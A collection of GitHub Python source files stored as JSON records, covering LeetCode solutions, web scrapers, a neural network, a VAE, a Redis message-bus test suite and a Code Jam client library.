:type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n \n return self.data[row2+1][col2+1] - self.data[row2+1][col1] - self.data[row1][col2+1] + self.data[row1][col1]","repo_name":"cody-brock/toy-problems","sub_path":"range_sum_query_2d_immutable.py","file_name":"range_sum_query_2d_immutable.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3238048806","text":"# https://leetcode.com/problems/multiply-strings/discuss/17605/Easiest-JAVA-Solution-with-Graph-Explanation\n# This link shows the relationship of index, which is easier to implement.\nclass Solution:\n def multiply(self, num1: str, num2: str) -> str:\n M, N = len(num1), len(num2)\n res = [0 for _ in range(M + N)]\n for i in range(M):\n for j in range(N):\n res[i+j+1] += int(num1[i]) * int(num2[j])\n \n for k in range(len(res)-1, -1, -1):\n if k-1 >= 0:\n res[k-1] += res[k] // 10\n res[k] = str(res[k] % 10)\n \n while len(res) > 1 and res[0] == \"0\":\n res = res[1:]\n return \"\".join(res)","repo_name":"chien-wei/LeetCode","sub_path":"0043_Multiply_Strings.py","file_name":"0043_Multiply_Strings.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12854836339","text":"class Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n n = 0\n k = len(nums)\n for i in range(k-n):\n if nums[i]==0:\n while k-1-n >= i or nums[k-1-n]==0:\n n+=1\n nums[i],nums[k-1-n]=nums[k-1-n],nums[i]\n\nif __name__ == \"__main__\":\n a = Solution()\n nums = [0]\n a.moveZeroes(nums)","repo_name":"mengyangbai/leetcode","sub_path":"practise/remove_zero.py","file_name":"remove_zero.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20761811638","text":"import numpy as np\nimport math\n\ndef sigmoid(x):\n z = 1/(1+np.exp(-x))\n return z\n\ndef sigmoid_derivative(x):\n z = x*(1-x)\n return z\n\nclass NeuralNetwork:\n def __init__(self, x, y):\n self.input = x\n self.weights1 = np.random.rand(self.input.shape[1],5)\n self.weights2 = np.random.rand(5,1)\n self.y = y\n self.output = np.zeros(self.y.shape)\n\n\n def feedforward(self):\n self.layer1 = sigmoid(np.dot(self.input, self.weights1))\n self.output = sigmoid(np.dot(self.layer1, self.weights2))\n\n def backprop(self):\n matr = 2*(self.y-self.output) * sigmoid_derivative(self.output)\n abc = np.dot(matr, self.weights2.T)\n d_weights2 = np.dot(self.layer1.T, matr)\n d_weights1 = np.dot(self.input.T, abc * sigmoid_derivative(self.layer1))\n self.weights1 += d_weights1\n self.weights2 += d_weights2\n \n def train(self):\n for i in range(1,1500):\n self.feedforward()\n self.backprop()\n\n\ndef main():\n x = np.array(([1,1],[0,0],[1,0],[0,1]))\n y = np.array(([1],[1],[0],[0]))\n first_instance = NeuralNetwork(x,y)\n first_instance.train()\n\n\n\n first_instance.input = np.array([1,1])\n first_instance.feedforward()\n\n print(first_instance.output)\nmain()\n\n\n","repo_name":"RedPipper/NeuralStudy","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17243251358","text":"import pyperclip\nimport urllib.request\nimport webbrowser\nimport os\nimport codecs\nfrom bs4 import BeautifulSoup\n\n####### 1. Descargar html pasando una url\n\n## Saco del clipboard la url copiada\nNewsUrl = pyperclip.paste()\n\n# Descargo la pagina\nfid=urllib.request.urlopen(NewsUrl)\nhtmlnewsfull=fid.read().decode('utf-8')\n\n####### 2. \"scrapear\" html y dejar solo el body \n\nsoup = BeautifulSoup(htmlnewsfull, 'html.parser')\ntext = str(soup.find(\"div\", {\"class\": \"body-nota\"}))\n\n\n# string_corte = 'content-top-right'\n\nstring_corte = 'Mirá también'\ntry:\n texto_final = text[:text.index(string_corte)]\nexcept IndexError:\n string_corte = 'content-top-right'\n try:\n texto_final = text[:text.index(string_corte)]\n except IndexError:\n texto_final = text[:text.index(string_corte)]\n\n# texto_final = text[:text.index(string_corte) + len(string_corte)]\n\ntexto_final = text[:text.index(string_corte)]\n\n####### 3. \"Printear\" el body depurado, y meterlo en otro html\n\nf = codecs.open(\"nota.html\", \"w\", \"utf-8\")\nf.write(str(texto_final))\nf.close()\n\n####### 4. Abrir el html \n\n# url = \"file://d/testdata.html\"\n\nwebbrowser.open_new_tab('nota.html')","repo_name":"acortazzo/NewsScrapper","sub_path":"newsScrapper.py","file_name":"newsScrapper.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18188519915","text":"import datetime\n\nfrom . import *\n\ncheck = Method(\"check\")\n# checks arguments are correct type and in range only.\n\ndef month_number_from_arg(month, error):\n try:\n month_number = Months.options[month]\n except KeyError:\n error(\n \"Months should be e.g. Jan/January or numbers \"\n \"in range 1 to 12, not %s\" % month\n )\n return 1\n else:\n return month_number\n\n@check.implementation(Months)\ndef Months_check(month_filter):\n month_filter.errors = []\n error = month_filter.errors.append\n month_filter.month_numbers = list()\n for month in month_filter.months: \n month_number = month_number_from_arg(month, error) - 1\n if month_number in month_filter.month_numbers:\n error(\n \"%s was added more than once\" % month_sequence[month_number]\n )\n month_filter.month_numbers.append(month_number)\n return month_filter.errors\n\n@check.implementation(FromDate)\ndef FromDate_check(from_date):\n from_date.errors = []\n error = from_date.errors.append\n year = from_date.year\n month = from_date.month or 1\n day = from_date.day or 1\n month_number = month_number_from_arg(month, error)\n if not isinstance(year, int):\n error(\"Year should be a whole number\")\n if not isinstance(day, int):\n error(\"Day should be a whole number\")\n if not (1900 < year < 2500):\n error(\"Year should be in range 1900 to 2500\")\n try:\n from_date.date = datetime.date(year, month_number, day)\n except:\n error(\"Invalid date\")\n return from_date.errors\n\nimport calendar\n\n@check.implementation(ToDate)\ndef ToDate_check(to_date):\n to_date.errors = []\n error = to_date.errors.append\n year = to_date.year\n month = to_date.month or 1\n day = to_date.day or -1\n if not isinstance(year, int):\n error(\"Year should be a whole number\")\n if not isinstance(day, int):\n error(\"Day should be a whole number\")\n if not (1900 < year < 2500):\n error(\"Year should be in range 1900 to 2500\")\n month_number = month_number_from_arg(month, error)\n if day is -1:\n # use last day of month\n _, day = calendar.monthrange(year, month_number)\n else:\n day = to_date.day\n try:\n to_date.date = datetime.date(year, month_number, day)\n except ValueError:\n error(\"Invalid date\")\n return to_date.errors\n\n@check.implementation(Addition, Subtraction, Multiplication, Division)\ndef Binop_check(binop):\n binop.errors = []\n left = check(binop.left)\n right = check(binop.right)\n return left or right\n\n@check.implementation(Pow)\ndef PowRoot_check(binop):\n binop.errors = []\n error = binop.errors.append\n exponent = binop.right\n if not isinstance(exponent, int) or exponent == 0:\n error(\"Exponent should be a positive, non-zero number.\")\n return check(binop.left) or binop.errors\n\n@check.implementation(*aggregations)\ndef Aggregation_check(aggregation):\n aggregation.errors = []\n def error(message):\n aggregation.errors.append(message)\n allowed_specifications = (ToDate, FromDate, Months)\n specification_errors = False\n if not isinstance(aggregation.dataset_name, str):\n error(\"First argument should be the name of a data set enclosed in \"\n \"parentheses. \")\n else:\n if SampleTable.name_exists(aggregation.dataset_name, error):\n aggregation.sample_table = SampleTable.with_name(aggregation.dataset_name)\n for specification in aggregation.specification:\n if not isinstance(specification, allowed_specifications):\n error(\n \"%(specification)s cannot be used inside \"\n \"%(aggregation_name)s(...).\\n\"\n \"Required arguments are table name: %(table_names)s.\\n\"\n \"Optional arguments are %(possibilities)s.\" % dict(\n specification = specification,\n aggregation_name = aggregation.__class__.__name__,\n table_names = \", \".join(\n map(\n '\"%s %s\"'.__mod__,\n climate_sample_tables\n )\n ),\n possibilities = \", \".join(\n Class.__name__+\"(...)\" for Class in allowed_specifications\n )\n )\n )\n specification_errors |= bool(check(specification))\n return aggregation.errors or specification_errors\n\n@check.implementation(Number)\ndef Number_check(positive_number):\n if positive_number.units._positive and positive_number.value < 0:\n positive_number.errors = [\"Affine Numbers must be positive\"]\n else:\n positive_number.errors = []\n return positive_number.errors\n\ncheck_analysis = Method(\"check_analysis\")\n\n@check_analysis.implementation(Number)\ndef Number_check_analysis(number, out):\n out(number.value)\n if number.errors:\n out(\"# ^ \", \", \".join(number.errors))\n\n@check_analysis.implementation(FromDate, ToDate)\ndef FromDate_check_analysis(date_spec, out):\n out(date_spec)\n if date_spec.errors:\n out(\"# ^ \", \", \".join(date_spec.errors))\n\n@check_analysis.implementation(*operations)\ndef Binop_check_analysis(binop, out):\n def indent(*strings):\n out(\" \", *strings)\n\n out(\"(\")\n check_analysis(binop.left, indent)\n\n indent(binop.op)\n \n check_analysis(binop.right, indent)\n out(\")\")\n if binop.errors:\n out(\"# ^ \", \", \".join(binop.errors))\n\n\n@check_analysis.implementation(*aggregations)\ndef aggregation_check_analysis(aggregation, out):\n out(type(aggregation).__name__, \"(\")\n def indent(*strings):\n out(\" \", *strings)\n indent(str(aggregation.sample_table), \",\")\n \n for specification in aggregation.specification:\n check_analysis(specification, indent)\n out(\")\")\n if aggregation.errors:\n out(\"# ^ \", \", \".join(aggregation.errors))\n\n@check_analysis.implementation(int, float)\ndef primitive_number_check_analysis(number, out):\n out(number)\n\n ","repo_name":"openincident/cert","sub_path":"modules/ClimateDataPortal/DSL/Check.py","file_name":"Check.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5851050184","text":"from collections import OrderedDict\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import functional as F\n\n\nclass FCLayer(nn.Module):\n\n def __init__(self, chans_in, chans_out, activation=nn.ReLU):\n super(FCLayer, self).__init__()\n self.fc = nn.Linear(chans_in, chans_out)\n self.act_fn = activation()\n\n def forward(self, x):\n return self.act_fn(self.fc(x))\n\n\nclass GaussianEncoder(nn.Module):\n def __init__(self, inp_dim, hid_dim, z_dim, num_hidden=1):\n super(GaussianEncoder, self).__init__()\n self.input_to_hidden = nn.Linear(inp_dim, hid_dim)\n self.hiddens = None\n if num_hidden > 0:\n self.hiddens = nn.Sequential(OrderedDict([('fc%d' % (l + 1), FCLayer(hid_dim, hid_dim, activation=nn.ReLU))\n for l in range(num_hidden)]))\n self.mu_encode = nn.Linear(hid_dim, z_dim)\n self.logvar_encode = nn.Linear(hid_dim, z_dim)\n\n self.relu = nn.ReLU()\n\n def forward(self, x):\n h1 = self.relu(self.input_to_hidden(x))\n if self.hiddens is not None:\n h1 = self.hiddens(h1)\n return self.mu_encode(h1), self.logvar_encode(h1)\n\n\nclass Decoder(nn.Module):\n def __init__(self, inp_dim, hid_dim, z_dim, num_hidden=1):\n super(Decoder, self).__init__()\n self.from_z_to_hidden = nn.Linear(z_dim, hid_dim)\n self.hiddens = None\n if num_hidden > 0:\n self.hiddens = nn.Sequential(OrderedDict([('fc%d' % (l+1), FCLayer(hid_dim, hid_dim, activation=nn.ReLU))\n for l in range(num_hidden)]))\n self.hidden_to_input = nn.Linear(hid_dim, inp_dim)\n\n self.sigmoid = nn.Sigmoid()\n self.relu = nn.ReLU()\n\n def forward(self, z):\n h3 = self.relu(self.from_z_to_hidden(z))\n if self.hiddens is not None:\n h3 = self.hiddens(h3)\n return self.sigmoid(self.hidden_to_input(h3))\n\n\nclass GaussianGraphVAE(nn.Module):\n def __init__(self, num_nodes, enc_cls=GaussianEncoder, dec_cls=Decoder, hid_dim=400, z_dim=20,\n enc_kwargs=None, dec_kwargs=None):\n super(GaussianGraphVAE, self).__init__()\n\n self.inp_dim = num_nodes**2\n self.z_dim = z_dim\n\n if enc_kwargs is None:\n enc_kwargs = {}\n\n if dec_kwargs is None:\n dec_kwargs = {}\n\n self.encoder = enc_cls(inp_dim=self.inp_dim, hid_dim=hid_dim, z_dim=z_dim, **enc_kwargs)\n self.decoder = dec_cls(inp_dim=self.inp_dim, hid_dim=hid_dim, z_dim=z_dim, **dec_kwargs)\n\n def encode(self, x):\n return self.encoder.forward(x)\n\n def reparameterize(self, mu, logvar):\n if self.training:\n std = logvar.mul(0.5).exp_()\n eps = Variable(std.data.new(std.size()).normal_())\n return eps.mul(std).add_(mu)\n else:\n return mu\n\n def decode(self, z):\n return self.decoder.forward(z)\n\n def forward(self, x):\n mu, logvar = self.encode(x.view(-1, self.inp_dim))\n z = self.reparameterize(mu, logvar)\n return self.decode(z), mu, logvar\n\n def loss_function(self, recon_x, x, mu, logvar):\n BCE = F.binary_cross_entropy(recon_x, x.view(-1, self.inp_dim), size_average=False)\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n\n return BCE + KLD","repo_name":"gaxler/comb2vec","sub_path":"comb2vec/models/adjacency_mat_vae.py","file_name":"adjacency_mat_vae.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"41889811386","text":"# Скачайте файл по ссылке https://www.dropbox.com/s/sipsmqpw1gwzd37/referat.txt?dl=0\n# Прочитайте содержимое файла в перменную, подсчитайте длинну получившейся строки\n# Подсчитайте количество слов в тексте\n# Замените точки в тексте на восклицательные знаки\n# Сохраните результат в файл referat2.txt\n\nwith open(\"referat.txt\", \"r\", encoding=\"utf-8\") as referat:\n referat_symbols_count = 0\n referat_words_count = 0\n\n for line in referat:\n referat_symbols_count += len(line)\n referat_words_count += len(line.split())\n line = line.replace('.', '!') \n with open('referat2.txt', 'a', encoding='utf-8') as referat2: \n referat2.write(line)\n\n print(referat_symbols_count) # получилось 1509, а в notepad++ пишет, что 2823. Где верно?\n print(referat_words_count) # совпало с подсчетом в word\n","repo_name":"yamike90/learnPython_hw3","sub_path":"working_with_files.py","file_name":"working_with_files.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38320366941","text":"import math\n\n\ndef total_sum(sub):\n total = 0\n for item in sub:\n total += item\n return total\n\n\ndef max_sum_subarray(arr, k):\n\n maxSum = -math.inf\n\n i = 0\n j = k\n while j <= len(arr):\n temp_sum = 0\n temp_sum = total_sum(arr[i:j])\n if temp_sum > maxSum:\n maxSum = temp_sum\n i += 1\n j += 1\n\n return maxSum\n\n\nout = max_sum_subarray([1, 2, 3, 4, 5, 6], 4)\nprint(out)\n","repo_name":"ajaypokharel/dsa_revision","sub_path":"slidWindow/maxSumSubarray.py","file_name":"maxSumSubarray.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9790073738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 20 22:10:47 2018\n\n@author: profa\n\"\"\"\n\n## nltk examples\nimport nltk\nfrom nltk.tokenize import word_tokenize\n\n\ntext=\"To be or not to be\"\n \ntokens = [t for t in text.split()]\nprint(tokens)\n \nfreq = nltk.FreqDist(tokens)\n \nfor key,val in freq.items():\n print (str(key) + ':' + str(val))\n\nfreq.plot(20, cumulative=False)\n\nmytext = \"Hiking is dfsd fun! Hiking with dogs is more fun blood-thinner :)\"\nprint(word_tokenize(mytext))\n\n \n#####################################################\n#####################################################\n\n## Lets say we are unhappy with the tokenizer we are using\n## and wish to explicitly identify rules to define tokens\n## Try re and regular expressions!!\n## https://docs.python.org/3.4/library/re.html\n\n#%%\nimport re\nline = \"Lets assume we scrapted some text data from a website or corpus \\\n Lets try to find all of the valid email addresses such as \\\n asdfal2@als.com, Users1@gmail.de \\\n but not Dariush@@dasd-asasdsa.com.lo nor @someDomain.com \\\n what regex could we use ?!?!?!\"\n \nprint(\"\\n\\nword_tokenizer results ... \")\nprint(word_tokenize(line))\nprint(\"\\n\\nre results with regex defined appropriately ... \")\n \nmatch = re.findall(r'[\\w\\.-]+@[\\w\\.-]+', line)\nfor i in match:\n print(i)\n#%% \n## In-Class Exercise\n## https://docs.python.org/3.4/library/re.html \n##############################################\n############################################## \n##############################################\n\n## Use re to find tokens within a string of the following form.\n## Test on input strings to confirm correctness.\n## State Any Assumptions you may make.\n## 1) Dollar Amounts\n## 2) U.S. phone numbers\n## 3) Websites \n##\n##\n##\n ","repo_name":"boltonvandy/IST736repo","sub_path":"inClassExercises/02_inClassActivity_regularExpressions.py","file_name":"02_inClassActivity_regularExpressions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"1098818239","text":"# Find index of element that occurs more then len(A)//n times in array A\ndef solution(A):\n n = len(A)\n size = 0\n for k in xrange(n):\n if size == 0:\n size += 1\n value = A[k]\n else:\n if value != A[k]:\n size -= 1\n else:\n size += 1\n result = -1\n count = 0\n if size > 0:\n candidate = value\n for i in xrange(n):\n if A[i] == candidate:\n count += 1\n result = i\n return result if count > n//2 else -1\n","repo_name":"viktorpi/algorithms","sub_path":"algorithms/leader/dominant.py","file_name":"dominant.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29632129613","text":"import time\n\nfrom allocation import messagebus, services\nfrom allocation.core import commands, events\nfrom allocation.interfaces.database.db import session_factory\nfrom allocation.interfaces.external_bus import create_redis_client\nfrom allocation.unit_of_work import UnitOfWork\nfrom tests.conftest import (\n make_test_batch,\n make_test_order_item,\n make_test_sku,\n make_test_sku_product_and_batch,\n)\n\n\ndef test_redis_connection():\n client = create_redis_client()\n client.set(\"foo\", \"bar\")\n assert client.get(\"foo\") == b\"bar\"\n\n\ndef test_publish_event_to_redis_channel():\n client = create_redis_client()\n batch = make_test_batch(make_test_sku())\n event = events.BatchQuantityChanged(batch.uuid, 10)\n client.subscribe_to_channel(type(event))\n client.publish_channel_message(event)\n while True:\n retrieved_event = client.get_channel_message(type(event))\n if retrieved_event:\n assert event == retrieved_event\n break\n\n\ndef test_publish_event_to_redis_channel_via_handler():\n batch = make_test_batch(make_test_sku())\n event = events.BatchQuantityChanged(batch.uuid, 10)\n services.publish_message_to_external_bus(event)\n\n\ndef test_initiate_command_from_external_event():\n with UnitOfWork(session_factory) as uow:\n sku, product, batch = make_test_sku_product_and_batch()\n order_item_1, order_item_2 = make_test_order_item(sku), make_test_order_item(\n sku\n )\n product.allocate(order_item_1)\n product.allocate(order_item_2)\n uow.products.add(product)\n batch_id = batch.uuid\n sku_id = sku.uuid\n\n redis_client = create_redis_client()\n redis_client.subscribe_to_channel(commands.ChangeBatchQuantity)\n redis_client.subscribe_to_channel(events.OrderItemDeallocated)\n cmd = commands.ChangeBatchQuantity(sku_id, batch_id, 15)\n redis_client.publish_channel_message(cmd)\n\n while True:\n cmd = redis_client.get_channel_message(commands.ChangeBatchQuantity)\n if cmd:\n messagebus.QUEUE.append(cmd)\n messagebus.handle(messagebus.QUEUE, UnitOfWork(session_factory))\n break\n time.sleep(0.5)\n\n while True:\n event = redis_client.get_channel_message(events.OrderItemDeallocated)\n if event:\n assert isinstance(event, events.OrderItemDeallocated)\n break\n time.sleep(0.5)\n","repo_name":"yassineayadi/cosmic-python","sub_path":"tests/integration/test_message_broker.py","file_name":"test_message_broker.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19762665001","text":"#CarDekho\nimport requests\nfrom bs4 import BeautifulSoup as bs\nimport csv\nurl = 'https://web.archive.org/web/20110924050541/http://www.cardekho.com/search/AllBrands/AllVehicleStyles/AllPriceRanges/Price-Low-High'\npage = requests.get(url)\nsoup = bs(page.content, 'html.parser')\n\ncars = soup.findAll('div', {'class' : 'comparediv'})\n\n#find cars brand name\ncars_brand = []\nfor b in soup.findAll('span', {'class': 'vechilediv'}):\n p = b.text.find('\\xa0')\n brand = b.text[0:p]\n cars_brand.append(brand.strip())\nresults = []\nfor car in cars:\n titles = car.findAll('div', {'class':'widthfiftyfour leftfloat'})\n prices = car.findAll('div', {'class':'pricereal'})\n # r = {}\n for t in range(len(titles)):\n title = titles[t].text.strip()\n price = prices[t].find('span').text\n for car_brand in cars_brand:\n if title.find(car_brand) != -1:\n brand = car_brand\n car_model = title.replace(brand,'').strip()\n r = {'Brand' : brand, 'Car Model': car_model, 'Price': price}\n results.append(r)\ncsv_columns = ['Brand', 'Car Model', 'Price']\ncsv_file = 'results.csv'\nwith open(csv_file, 'w', newline='', encoding='utf-8') as f:\n writer = csv.DictWriter(f, fieldnames=csv_columns)\n writer.writeheader()\n for data in results:\n writer.writerow(data)","repo_name":"khubah/Scraping-Portfolio","sub_path":"scrape-archiveOrg/CarDekho.py","file_name":"CarDekho.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38748171089","text":"#Type Coversion\nimport string\n\n\nx = 10\ny = 3.14\nz = \"20\"\n\n# \"20\" = > 20\n# string => float(number)\nz=float(z)\n\nz=z+50\nprint (z)\n\n# float(number) => string\nz=str(z)\n\nprint(type(z))","repo_name":"wanloparu/AI","sub_path":"ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13411763180","text":"from django import template\nimport math\nregister = template.Library()\n\n\n@register.simple_tag\ndef discount_calculation(price,discount):\n if discount is None or discount is 0:\n return price\n sellprice = price\n sellprice = price - (price * discount/100)\n return math.floor(sellprice)","repo_name":"Manjothub/Learning-Management-System","sub_path":"Home/templatetags/course_tags.py","file_name":"course_tags.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"31262807741","text":"import httplib\nimport json\nimport sys\nimport time\n\nfrom lib import error\nfrom lib import http_interface\nfrom lib import utils\n\n\nclass UserSubmission(object):\n \"\"\"A submission for a problem input, including result and timestamp.\"\"\"\n # There is are two statuses that are treated in a special way:\n #\n # - Submitted: This status is assigned to submissions for inputs for which the\n # judgement is not yet available. We optimistically consider Submitted\n # inputs to be correct.\n #\n # - Correct (+4 minutes): This status marks a solution as correct but also\n # adds a 4 minute penalty. To count these submissions correctly, we mark\n # them as correct and wrong at the same time, which gives points to the user\n # but also adds one wrong try in that input.\n _CORRECT_STATUSES = frozenset(['Correct', 'Submitted',\n 'Correct (+4 minutes)'])\n _WRONG_STATUSES = frozenset(['Incorrect', 'Time Expired',\n 'Correct (+4 minutes)'])\n _TIME_UNITS_TO_SECONDS = {'h': 3600, 'm': 60, 's': 1}\n\n def __init__(self, key, problem, input_id, status, timestamp):\n \"\"\"Constructor.\n\n Args:\n key: String with the submission key.\n problem: 0-based index of the submission's problem.\n input_id: Integer with the input id of the submission.\n status: String with the submission's status (Correct, Incorrect, etc.).\n timestamp: Number of seconds that have passed since the contest started\n when the submission was made.\n \"\"\"\n self.key = key\n self.problem = problem\n self.input_id = input_id\n self.status = status\n self.correct = UserSubmission._GetCorrectnessFromStatus(self.status)\n self.wrong = UserSubmission._GetWrongnessFromStatus(self.status)\n self.timestamp = timestamp\n\n @staticmethod\n def _GetCorrectnessFromStatus(status):\n \"\"\"Check whether the submission is correct given its status.\n\n Args:\n status: String with a submission's status.\n\n Returns:\n True if the submission's output is correct.\n \"\"\"\n # Correct types are specified in the _CORRECT_STATUSES set.\n return status in UserSubmission._CORRECT_STATUSES\n\n @staticmethod\n def _GetWrongnessFromStatus(status):\n \"\"\"Check whether the submission is wrong given its status.\n\n Args:\n status: String with a submission's status.\n\n Returns:\n True if the submission's output is wrong.\n \"\"\"\n # Wrong types are specified in the _WRONG_STATUSES set.\n return status in UserSubmission._WRONG_STATUSES\n\n @staticmethod\n def _ConvertTimestampToSeconds(timestamp):\n \"\"\"Convert a timestamp from a readable format into a number of seconds.\n\n The specified timestamp must be formatted as \"[[%dh] %dm] %ds\", where \"%d\"\n are integers.\n\n Args:\n timestamp: String with the human-readable timestamp.\n\n Returns:\n The number of seconds since the beginning of the contest represented by\n timestamp.\n \"\"\"\n seconds = 0\n for token in timestamp.split():\n time, unit = int(token[:-1]), token[-1]\n seconds += time * UserSubmission._TIME_UNITS_TO_SECONDS[unit]\n return seconds\n\n @staticmethod\n def FromJsonResponse(json_response, problems):\n \"\"\"Convert a JSON response with a submission into a more usable format.\n\n Args:\n json_response: JSON response recevied from the server that must be parsed.\n problems: Iterable with all problems in the current contest.\n\n Returns:\n An UserSubmission object with the parsed json_response.\n\n Raises:\n error.ServerError: An error\n \"\"\"\n # Extract information needed from the JSON response.\n try:\n submission_key = json_response['k']\n problem_key = json_response['p']\n input_id = json_response['d']\n status = json_response['s']\n timestamp = json_response['t']\n except KeyError as e:\n raise error.ServerError('Cannot find field {0} in user '\n 'submission.\\n'.format(e))\n\n # Parse information into a more usable format and return an user submission.\n problem_index = utils.GetProblemIndexFromKey(problems, problem_key)\n parsed_timestamp = UserSubmission._ConvertTimestampToSeconds(timestamp)\n return UserSubmission(submission_key, problem_index, input_id, status,\n parsed_timestamp)\n\n\ndef GetUserSubmissions(host, cookie, contest_id, problems):\n \"\"\"Get the current user's submissions for the current contest.\n\n Args:\n host: Domain name of the server where the contest is running.\n cookie: Cookie for the current user.\n contest_id: Id of the contest where the user is participating.\n problems: Iterable with all problems in the current contest.\n\n Returns:\n A list of UserSubmission objects with the user submissions for the current\n contest.\n\n Raises:\n error.NetworkError: If a network error occurs while communicating with the\n server.\n error.ServerError: If the server answers code distinct than 200 or the\n response is a malformed JSON.\n \"\"\"\n # Send an HTTP request to get the contest events.\n sys.stdout.write('Getting events of contest {0} from \"{1}\"...\\n'.format(\n contest_id, host))\n request_referer = 'http://{0}/codejam/contest/dashboard?c={1}'.format(\n host, contest_id)\n request_arguments = {\n 'cmd': 'GetEvents',\n 'contest': contest_id,\n 'zx': str(int(time.time())),\n }\n request_headers = {\n 'Referer': request_referer,\n 'Cookie': cookie,\n }\n try:\n status, reason, response = http_interface.Get(\n host, '/codejam/contest/dashboard/do', request_arguments,\n request_headers)\n except httplib.HTTPException as e:\n raise error.NetworkError(\n 'HTTP exception while retrieving user submissions from the Google Code '\n 'Jam server: {0}.\\n'.format(e))\n\n # Check if the status is not good.\n if status != 200 or reason != 'OK':\n raise error.ServerError('Error while communicating with the server, cannot '\n 'get contest events. Check that the host, username '\n 'and contest id are valid.\\n')\n\n # Parse the JSON response and extract the user submissions (or attempts).\n try:\n json_response = json.loads(response)\n submissions = json_response.get('a')\n if submissions is None:\n return None\n except ValueError as e:\n raise error.ServerError('Cannot parse JSON from server response: '\n '{0}.\\n'.format(e))\n\n # Process each user submission and return them in a list.\n return [UserSubmission.FromJsonResponse(submission, problems)\n for submission in submissions]\n","repo_name":"hophacker/algorithm_coding","sub_path":"codejam-commandline-1.2-beta1/lib/user_submissions.py","file_name":"user_submissions.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"12885534678","text":"\"\"\"lightcurve_to_npy\n\nRevision ID: a169bf8b211d\nRevises: 423507fdb18e\nCreate Date: 2017-09-09 22:32:17.558901\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'a169bf8b211d'\ndown_revision = '423507fdb18e'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('LightCurves', sa.Column('features_filename', sa.Text(), nullable=True))\n op.add_column('LightCurves', sa.Column('lc_filename', sa.Text(), nullable=True))\n op.drop_column('LightCurves', 'hdf_filename')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('LightCurves', sa.Column('hdf_filename', sa.TEXT(), nullable=True))\n op.drop_column('LightCurves', 'lc_filename')\n op.drop_column('LightCurves', 'features_filename')\n ### end Alembic commands ###\n","repo_name":"carpyncho/carpyncho","sub_path":"carpyncho/migrations/versions/a169bf8b211d_lightcurve_to_npy.py","file_name":"a169bf8b211d_lightcurve_to_npy.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33863319514","text":"has2 = {}\ndef solve(n):\n seq=[]\n seq.append(x)\n temp=x\n while(temp>1):\n if temp%2==0:\n temp=int(temp/2)\n if temp in has2:\n seq+=has2[temp]\n break\n else:\n seq.append(temp)\n else:\n temp=3*temp+1\n if temp in has2:\n seq+=has2[temp]\n break\n else:\n seq.append(temp)\n\n\n has2[x]=seq\n return len(seq)\n\n\nprint(solve(5))\nprint(solve(10))\n","repo_name":"TheFenrisLycaon/Competitive-Programming","sub_path":"Wow/vopt.py","file_name":"vopt.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35860751991","text":"class Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n head = node = ListNode()\n carry = 0\n\n while l1 and l2:\n total = l1.val + l2.val + carry\n carry = total // 